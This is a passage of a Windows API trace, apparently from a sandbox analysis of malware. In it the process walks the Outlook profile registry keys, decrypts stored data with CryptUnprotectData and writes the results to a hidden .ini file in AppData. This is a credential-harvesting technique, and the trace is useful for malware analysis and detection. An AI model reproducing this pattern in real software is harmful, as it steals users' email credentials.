Buffer=0x422670*) returned 0x0 [0243.413] NtClose (Handle=0xbc) returned 0x0 [0243.414] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x8, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0243.414] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.414] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.414] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.414] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.414] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x2e, ByteOffset=0x19d600*=874, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.414] NtClose (Handle=0xbc) returned 0x0 [0243.423] RtlIntegerToChar (in: Value=0x0, Base=0x0, Length=0x20, String=0x19d6e8 | out: String="0") returned 0x0 [0243.424] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.424] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.424] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.424] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.424] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x6, ByteOffset=0x19d600*=920, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.424] NtClose (Handle=0xbc) returned 0x0 [0243.425] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x9, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0243.425] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.425] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.425] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.425] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.425] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x20, ByteOffset=0x19d600*=926, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.474] NtClose (Handle=0xbc) returned 0x0 [0243.483] RtlIntegerToChar (in: Value=0xe0003, Base=0x0, Length=0x20, String=0x19d6e8 | out: String="917507") returned 0x0 [0243.483] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.484] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.484] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.484] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.484] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x10, ByteOffset=0x19d600*=958, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.484] NtClose (Handle=0xbc) returned 0x0 [0243.485] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0xa, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0243.485] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.485] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.485] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.485] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.485] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x2e, ByteOffset=0x19d600*=974, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.485] NtClose (Handle=0xbc) returned 0x0 [0243.486] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.486] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.486] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.486] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.486] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0xb6, ByteOffset=0x19d600*=1020, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.486] NtClose (Handle=0xbc) returned 0x0 [0243.487] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0xb, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0243.488] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.488] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.488] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.488] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.488] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x30, ByteOffset=0x19d600*=1202, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.488] NtClose (Handle=0xbc) returned 0x0 [0243.489] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.489] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.489] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.489] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.489] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x1c, ByteOffset=0x19d600*=1250, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.489] NtClose (Handle=0xbc) returned 0x0 [0243.490] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0xc, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0243.490] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.490] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.490] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.490] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.490] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x20, ByteOffset=0x19d600*=1278, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.491] NtClose (Handle=0xbc) returned 0x0 [0243.491] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.491] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.492] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.492] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.492] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x14, ByteOffset=0x19d600*=1310, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.492] NtClose (Handle=0xbc) returned 0x0 [0243.493] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0xd, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0243.493] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.493] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.493] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.493] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.493] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x1c, ByteOffset=0x19d600*=1330, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.494] NtClose (Handle=0xbc) returned 0x0 [0243.497] CryptUnprotectData (in: pDataIn=0x19d6c0, ppszDataDescr=0x0, pOptionalEntropy=0x0, pvReserved=0x0, pPromptStruct=0x0, dwFlags=0x1, pDataOut=0x19d6b8 | out: ppszDataDescr=0x0, pDataOut=0x19d6b8) returned 1 [0243.569] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x428b98) returned 1 [0243.569] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.569] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0x110, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.570] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.570] NtQueryInformationFile (in: FileHandle=0x110, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.570] NtWriteFile (in: FileHandle=0x110, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x1c, ByteOffset=0x19d600*=1358, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.570] NtClose (Handle=0x110) returned 0x0 [0243.571] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0xe, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x8000001a [0243.571] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d720, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.571] NtCreateFile (in: FileHandle=0x19d740, DesiredAccess=0x12019f, ObjectAttributes=0x19d708*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d728, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d740*=0x110, IoStatusBlock=0x19d728*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.571] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.571] NtQueryInformationFile (in: FileHandle=0x110, IoStatusBlock=0x19d728, FileInformation=0x19d680, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d728, FileInformation=0x19d680) returned 0x0 [0243.571] NtWriteFile (in: FileHandle=0x110, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d728, Buffer=0x422670*, Length=0x4, ByteOffset=0x19d698*=1386, Key=0x0 | out: IoStatusBlock=0x19d728, Buffer=0x422670*) returned 0x0 [0243.571] NtClose (Handle=0x110) returned 0x0 [0243.572] NtClose (Handle=0x104) returned 0x0 [0243.572] NtEnumerateKey (in: KeyHandle=0x108, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x19db80, Length=0x400, ResultLength=0x19e3dc | out: KeyInformation=0x19db80, ResultLength=0x19e3dc) returned 0x0 [0243.573] NtCreateKey (in: KeyHandle=0x19e3d0, DesiredAccess=0x20219, ObjectAttributes=0x19d738*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19e3d0*=0x104) returned 0x0 [0243.573] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0243.573] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.573] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0x110, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.573] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.573] NtQueryInformationFile (in: FileHandle=0x110, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.573] NtWriteFile (in: FileHandle=0x110, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0xc, ByteOffset=0x19d600*=1390, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.574] NtClose (Handle=0x110) returned 0x0 [0243.574] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.574] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0x110, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, 